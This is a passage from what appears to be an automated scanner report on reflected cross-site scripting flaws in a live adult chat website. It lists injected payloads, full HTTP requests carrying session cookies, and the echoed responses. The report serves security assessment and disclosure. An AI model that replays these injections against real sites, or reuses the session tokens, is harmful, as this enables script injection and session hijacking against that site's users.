The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80442'-alert(1)-'ebd4ed614b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:37 GMT Connection: close Content-Length: 32369 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.116. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-video-features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2028a"><a>c334382ea0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 32222 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.117. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/shemale-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f758'-alert(1)-'be71a5fa912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:06 GMT Connection: close Content-Length: 92716 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.118. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/shemale-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e5c"><a>069e897b555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:34 GMT Connection: close Content-Length: 92559 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1"> ...[SNIP]...
2.119. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/shemale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8242"><a>b60847be956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shemale/?f8242"><a>b60847be956=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:15 GMT Connection: close Content-Length: 224539 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shemale/?f8242"><a>b60847be956=1"> ...[SNIP]...
2.120. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/shemale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7464'-alert(1)-'af09ad182b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:31 GMT Connection: close Content-Length: 224765 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.121. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/shy-girl/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1a0"><a>61a08cd9cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:23 GMT Connection: close Content-Length: 171425 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1"> ...[SNIP]...
2.122. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/shy-girl/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df49d'-alert(1)-'469a7a377c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:40 GMT Connection: close Content-Length: 171563 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.123. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/liveexperts.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42604'><a>750b6f3eb7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /liveexperts.asp?42604'><a>750b6f3eb7b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; 